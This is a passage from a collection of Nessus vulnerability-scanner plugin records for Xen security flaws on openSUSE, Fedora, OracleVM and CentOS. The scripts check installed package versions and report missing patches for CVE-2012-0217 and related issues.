value:\n\"This update of XEN fixed multiple security flaws that could be\nexploited by local attackers to cause a Denial of Service or\npotentially escalate privileges. Additionally, several other upstream\nchanges were backported.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=649209\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=683580\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=691256\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=694863\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=701686\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=704160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=706106\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=706574\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=708025\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=712051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=712823\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=714183\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=715655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=716695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=725169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=726332\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=727515\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=732782\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=734826\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=736824\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=739585\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=740165\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=746702\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757537\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=764077\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-debugsource-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-devel-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-doc-html-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-doc-pdf-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-default-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-default-debuginfo-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-desktop-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-desktop-debuginfo-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-pae-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-pae-debuginfo-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-libs-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-libs-debuginfo-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-tools-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-tools-debuginfo-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-tools-domU-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-tools-domU-debuginfo-4.0.3_04-42.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-debugsource / xen-devel / xen-doc-html / xen-doc-pdf / etc\");\n}\n", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:10:43", "description": "make pygrub cope better with big files from guest (#818412\nCVE-2012-2625), 64-bit PV guest privilege escalation vulnerability\n[CVE-2012-0217], guest denial of service on syscall/sysenter exception\ngeneration [CVE-2012-0218], PV guest host Denial of Service\n[CVE-2012-2934]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "published": "2012-06-26T00:00:00", "title": "Fedora 15 : xen-4.1.2-8.fc15 (2012-9430)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "modified": "2012-06-26T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xen", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2012-9430.NASL", "href": "https://www.tenable.com/plugins/nessus/59696", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-9430.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59696);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2012-9430\");\n\n script_name(english:\"Fedora 15 : xen-4.1.2-8.fc15 (2012-9430)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"make pygrub cope better with big files from guest (#818412\nCVE-2012-2625), 64-bit PV guest privilege escalation vulnerability\n[CVE-2012-0217], guest denial of service on syscall/sysenter exception\ngeneration [CVE-2012-0218], PV guest host Denial of Service\n[CVE-2012-2934]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/082752.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ebc2ae1d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"xen-4.1.2-8.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:10:43", "description": "make pygrub cope better with big files from guest (#818412\nCVE-2012-2625), 64-bit PV guest privilege escalation vulnerability\n[CVE-2012-0217], guest denial of service on syscall/sysenter exception\ngeneration [CVE-2012-0218], PV guest host Denial of Service\n[CVE-2012-2934]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "published": "2012-06-26T00:00:00", "title": "Fedora 16 : xen-4.1.2-8.fc16 (2012-9399)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "modified": "2012-06-26T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xen", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-9399.NASL", "href": "https://www.tenable.com/plugins/nessus/59693", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-9399.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59693);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2012-9399\");\n\n script_name(english:\"Fedora 16 : xen-4.1.2-8.fc16 (2012-9399)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"make pygrub cope better with big files from guest (#818412\nCVE-2012-2625), 64-bit PV guest privilege escalation vulnerability\n[CVE-2012-0217], guest denial of service on syscall/sysenter exception\ngeneration [CVE-2012-0218], PV guest host Denial of Service\n[CVE-2012-2934]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/082754.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f18b6bbe\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"xen-4.1.2-8.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T13:23:10", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2012-0217 CVE-2012-0218: guest DoS on\n syscall/sysenter exception generation [orabug 13993157]", "edition": 29, "published": "2014-11-26T00:00:00", "title": "OracleVM 2.2 : xen (OVMSA-2012-0022)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218"], "modified": "2014-11-26T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:xen-64", "p-cpe:/a:oracle:vm:xen-devel", "p-cpe:/a:oracle:vm:xen-debugger", "cpe:/o:oracle:vm_server:2.2", "p-cpe:/a:oracle:vm:xen-pvhvm-devel", "p-cpe:/a:oracle:vm:xen", "p-cpe:/a:oracle:vm:xen-tools"], "id": "ORACLEVM_OVMSA-2012-0022.NASL", "href": "https://www.tenable.com/plugins/nessus/79478", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2012-0022.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79478);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\");\n script_bugtraq_id(53856, 53955);\n\n script_name(english:\"OracleVM 2.2 : xen (OVMSA-2012-0022)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2012-0217 CVE-2012-0218: guest DoS on\n syscall/sysenter exception generation [orabug 13993157]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2012-June/000084.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-debugger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-pvhvm-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:2.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"2\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 2.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-3.4.0-0.1.39.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-64-3.4.0-0.1.39.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-debugger-3.4.0-0.1.39.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-devel-3.4.0-0.1.39.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-pvhvm-devel-3.4.0-0.1.39.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-tools-3.4.0-0.1.39.el5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-64 / xen-debugger / xen-devel / xen-pvhvm-devel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:27:45", "description": "Updated kernel packages that fix two security issues are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* It was found that the Xen hypervisor implementation as shipped with\nRed Hat Enterprise Linux 5 did not properly restrict the syscall\nreturn addresses in the sysret return path to canonical addresses. An\nunprivileged user in a 64-bit para-virtualized guest, that is running\non a 64-bit host that has an Intel CPU, could use this flaw to crash\nthe host or, potentially, escalate their privileges, allowing them to\nexecute arbitrary code at the hypervisor level. (CVE-2012-0217,\nImportant)\n\n* It was found that guests could trigger a bug in earlier AMD CPUs,\nleading to a CPU hard lockup, when running on the Xen hypervisor\nimplementation. An unprivileged user in a 64-bit para-virtualized\nguest could use this flaw to crash the host. Warning: After installing\nthis update, hosts that are using an affected AMD CPU (refer to Red\nHat Bugzilla bug #824966 for a list) will fail to boot. In order to\nboot such hosts, the new kernel parameter, allow_unsafe, can be used\n('allow_unsafe=on'). This option should only be used with hosts that\nare running trusted guests, as setting it to 'on' reintroduces the\nflaw (allowing guests to crash the host). (CVE-2012-2934, Moderate)\n\nNote: For Red Hat Enterprise Linux guests, only privileged guest users\ncan exploit the CVE-2012-0217 and CVE-2012-2934 issues.\n\nRed Hat would like to thank the Xen project for reporting these\nissues. Upstream acknowledges Rafal Wojtczuk as the original reporter\nof CVE-2012-0217.\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues. The system must be\nrebooted for this update to take effect.", "edition": 26, "published": "2012-06-14T00:00:00", "title": "CentOS 5 : kernel (CESA-2012:0721)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "modified": "2012-06-14T00:00:00", "cpe": ["p-cpe:/a:centos:centos:kernel-PAE-devel", "p-cpe:/a:centos:centos:kernel-xen-devel", "p-cpe:/a:centos:centos:kernel-xen", "p-cpe:/a:centos:centos:kernel-doc", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-headers", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:kernel-PAE", "p-cpe:/a:centos:centos:kernel-debug-devel"], "id": "CENTOS_RHSA-2012-0721.NASL", "href": "https://www.tenable.com/plugins/nessus/59479", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0721 and \n# CentOS Errata and Security Advisory 2012:0721 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59479);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-2934\");\n script_bugtraq_id(53961);\n script_xref(name:\"RHSA\", value:\"2012:0721\");\n\n script_name(english:\"CentOS 5 : kernel (CESA-2012:0721)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n 